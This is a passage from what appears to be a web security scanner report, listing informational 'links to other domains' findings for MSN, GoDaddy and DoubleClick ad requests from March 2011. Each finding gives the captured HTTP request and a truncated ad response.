Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 855
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255285-T20670740-C21000000000039118
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:42:32 GMT
Content-Length: 855


//<![CDATA[
function getRADIds() { return{"adid":"21000000000039118","pid":"8255285","targetid":"20670740"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003X/21000000000039118.1??PID=8255285&amp;UIT=G&amp;TargetID=20670740&amp;AN=1090734417&amp;PG=CMS3TO&amp;ASID=f99de837f6dd41fca8376de9aa5fbd25" target="_blank"><img src="http://a.ads2.msads.net/CIS/115/000/000/000/013/260.jpg" width="728" height="90" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.2. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TO&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 850
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255285-T20670740-C82000000000061690
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:41:50 GMT
Content-Length: 850


//<![CDATA[
function getRADIds() { return{"adid":"82000000000061690","pid":"8255285","targetid":"20670740"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003X/82000000000061690.1??PID=8255285&amp;UIT=G&amp;TargetID=20670740&amp;AN=33638422&amp;PG=CMS3TO&amp;ASID=3b9370ff509b4726973ec5e07ad3f358" target="_blank"><img src="http://a.ads2.msads.net/CIS/22/000/000/000/013/279.jpg" width="728" height="90" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.3. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TO&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 856
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255285-T20670740-C100000000000048854
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:41:08 GMT
Content-Length: 856


//<![CDATA[
function getRADIds() { return{"adid":"100000000000048854","pid":"8255285","targetid":"20670740"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}

...[SNIP]...
<a href="http://g.msn.com/2AD0003X/100000000000048854.1??PID=8255285&amp;UIT=G&amp;TargetID=20670740&amp;AN=137038732&amp;PG=CMS3TO&amp;ASID=71d281041069489198470aa84e79b805" target="_blank"><img src="http://a.ads2.msads.net/CIS/117/000/000/000/012/976.jpg" width="728" height="90" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.4. http://a12.alphagodaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a12.alphagodaddy.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ref=http://cloudscan.org/&url=http://cloudscan.org/&leo=0 HTTP/1.1
Host: a12.alphagodaddy.com
Proxy-Connection: keep-alive
Referer: http://cloudscan.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 14:30:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 5331
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- 1 --><!-- 2 --><!-- 3 --><!-- 4 --><html>
   <body style='MARGIN:0px;' >
       <table cellpadding='0' cellspacing='0' border='0' align='center' style='FONT-SIZE:10px;COLOR:black;BORDER-TOP-STYLE:none;F
...[SNIP]...
<td>
                            <a href="https://www.godaddy.com/domains/search.aspx?isc=gpash022" target="_top"><img src="img/domain_bnr1_220x59.png" style="border:0px;padding:0px;margin:0px;" alt="Buy Domains">
...[SNIP]...
<td nowrap style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:tahoma,arial,verdana;font-weight:bold'><a href='https://www.godaddy.com/gdshop/hosting/landing.asp?isc=gpash016' style='FONT-SIZE:11px;COLOR:blue;TEXT-DECORATION:underline' target='_top'>Turbo
                                               Charged Web Hosting!</a>
...[SNIP]...
<td nowrap style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:arial,tahoma,verdana;font-weight:bold'><a href='https://www.godaddy.com/gdshop/website.asp?isc=gpash017' style='FONT-SIZE:11px;COLOR:blue;TEXT-DECORATION:underline' target='_top'>Build
                                               your Web site Online in Minutes!</a>
...[SNIP]...
<td>
                               <a href='https://www.godaddy.com?isc=GPASH001' target='_top'><img border="0" src='https://images.secureserver.net/hosting_ads/gdlog_headonly_trans.gif'></a>
...[SNIP]...
<b>This page is hosted free, courtesy of <a href="https://www.godaddy.com?isc=GPASH002" style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>
                                           GoDaddy.com</a>
...[SNIP]...
<span style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:tahoma,arial,verdana;TEXT-ALIGN:right;'>
                                   <a href='https://www.godaddy.com/gdshop/registrar/search.asp?isc=GPASH003&amp;se=%2B&amp;ci=414'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'><b>
...[SNIP]...
<br>
                                   Visit <a href='https://www.godaddy.com?isc=GPASH004' style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>
                                       GoDaddy.com</a> for the best values on: <a href='https://www.godaddy.com/gdshop/registrar/search.asp?isc=GPASH005&amp;se=%2B&amp;ci=414'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>Domain names</a>, <a href='https://www.godaddy.com/gdshop/hosting/landing.asp?isc=GPASH006&amp;se=%2B&amp;ci=415'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>Web hosting</a> and more! See <a href='https://www.godaddy.com/gdshop/catalog.asp?isc=GPASH009&amp;se=%2B&amp;ci=287'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>product catalog.</a>
...[SNIP]...
20.5. http://a12.alphagodaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a12.alphagodaddy.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ref=http://cloudscan.org/&url=http://cloudscan.org/&leo=0 HTTP/1.1
Host: a12.alphagodaddy.com
Proxy-Connection: keep-alive
Referer: http://cloudscan.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 14:30:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 5334
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- 1 --><!-- 2 --><!-- 3 --><!-- 4 --><html>
   <body style='MARGIN:0px;' >
       <table cellpadding='0' cellspacing='0' border='0' align='center' style='FONT-SIZE:10px;COLOR:black;BORDER-TOP-STYLE:none;F
...[SNIP]...
<td>
                            <a href="https://www.godaddy.com/email/email-hosting.aspx?isc=gpash023" target="_top"><img src="img/email_bnr4_220x59.png" style="border:0px;padding:0px;margin:0px;" alt="Get E-Mail">
...[SNIP]...
<td nowrap style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:tahoma,arial,verdana;font-weight:bold'><a href='https://www.godaddy.com/gdshop/hosting/landing.asp?isc=gpash016' style='FONT-SIZE:11px;COLOR:blue;TEXT-DECORATION:underline' target='_top'>Turbo
                                               Charged Web Hosting!</a>
...[SNIP]...
<td nowrap style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:arial,tahoma,verdana;font-weight:bold'><a href='https://www.godaddy.com/gdshop/website.asp?isc=gpash017' style='FONT-SIZE:11px;COLOR:blue;TEXT-DECORATION:underline' target='_top'>Build
                                               your Web site Online in Minutes!</a>
...[SNIP]...
<td>
                               <a href='https://www.godaddy.com?isc=GPASH001' target='_top'><img border="0" src='https://images.secureserver.net/hosting_ads/gdlog_headonly_trans.gif'></a>
...[SNIP]...
<b>This page is hosted free, courtesy of <a href="https://www.godaddy.com?isc=GPASH002" style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>
                                           GoDaddy.com</a>
...[SNIP]...
<span style='FONT-SIZE:10px;COLOR:black;FONT-FAMILY:tahoma,arial,verdana;TEXT-ALIGN:right;'>
                                   <a href='https://www.godaddy.com/gdshop/registrar/search.asp?isc=GPASH003&amp;se=%2B&amp;ci=414'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'><b>
...[SNIP]...
<br>
                                   Visit <a href='https://www.godaddy.com?isc=GPASH004' style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>
                                       GoDaddy.com</a> for the best values on: <a href='https://www.godaddy.com/gdshop/registrar/search.asp?isc=GPASH005&amp;se=%2B&amp;ci=414'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>Domain names</a>, <a href='https://www.godaddy.com/gdshop/hosting/landing.asp?isc=GPASH006&amp;se=%2B&amp;ci=415'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>Web hosting</a> and more! See <a href='https://www.godaddy.com/gdshop/catalog.asp?isc=GPASH009&amp;se=%2B&amp;ci=287'
                                       style="FONT-SIZE:10px;COLOR:darkblue" target='_top'>product catalog.</a>
...[SNIP]...
20.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6858
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:13:37 GMT
Expires: Sat, 26 Mar 2011 13:13:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 16 11:15:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
B0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109"><img src="http://s0.2mdn.net/578176/728x90-TEAL-idea.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
20.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bt_-wDeeNTevBKsf8lQfYysThB5Wpie8BnfOH8hLjqLazM_CPrgIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzOacI4C-mYdGuXggntUYunXypU0Q&client=ca-pub-4063878933780912&adurl=;ord=87658063? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163399&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145404990&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145405038&frm=0&adk=1819763764&ga_vid=1598847012.1301145405&ga_sid=1301145405&ga_hid=1492445179&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=116&xpc=6WtNgd4o9K&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6923
Date: Sat, 26 Mar 2011 13:15:58 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:15:58 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 16 10:49:41 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
gL1AwAAAMQ&num=1&sig=AGiWqtzOacI4C-mYdGuXggntUYunXypU0Q&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V100%26promo%3DBCXXX03936"><img src="http://s0.2mdn.net/578176/728x90-GREY-199.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
20.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BTda1b-eNTciPAYPklQeboICmB5Wpie8BhaKK8hLjqLazM7DIsAIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtysVrjEJHKO7VVOMnmUlADhaK6Org&client=ca-pub-4063878933780912&adurl=;ord=1199944893? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163497&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145502322&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145502368&frm=0&adk=1819763764&ga_vid=11231893.1301145502&ga_sid=1301145502&ga_hid=600792461&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=94&xpc=01ebGx5qd0&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6923
Date: Sat, 26 Mar 2011 13:17:36 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:17:36 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 16 10:58:16 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
gL1AwAAAMQ&num=1&sig=AGiWqtysVrjEJHKO7VVOMnmUlADhaK6Org&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599"><img src="http://s0.2mdn.net/578176/728X90-GREY-599.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
20.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6773
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:13:14 GMT
Expires: Fri, 25 Mar 2011 19:13:14 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364"><img src="http://s0.2mdn.net/2450389/Capella_DR_standard_Online_Learn_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
20.10. http://ad.doubleclick.net/adi/huffpost.politics/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
